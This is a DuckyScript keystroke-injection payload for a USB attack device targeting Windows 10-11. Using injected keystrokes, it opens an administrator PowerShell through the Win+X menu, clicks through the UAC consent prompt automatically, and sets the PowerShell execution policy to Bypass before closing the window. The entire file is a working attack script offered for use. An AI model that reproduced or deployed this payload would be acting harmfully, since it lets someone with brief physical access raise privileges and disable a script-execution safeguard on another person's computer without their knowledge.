* ####################################################################################
* #                                                                                  |
* # Title        : Starting a PowerShell with administrator permissions in Windows   |
* # Author       : Aleff                                                             |
* # Version      : 1.0                                                               |
* # Category     : Execute                                                           |
* # Target       : Windows 10-11                                                     |
* #                                                                                  |
* ####################################################################################

* Requirements:
*     - Nothing

DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER

DELAY 2000
STRING Get-ExecutionPolicy -List
ENTER
DELAY 500
STRING Set-ExecutionPolicy Bypass
ENTER
DELAY 500
STRING Get-ExecutionPolicy -List
ENTER
DELAY 500

ALT F4
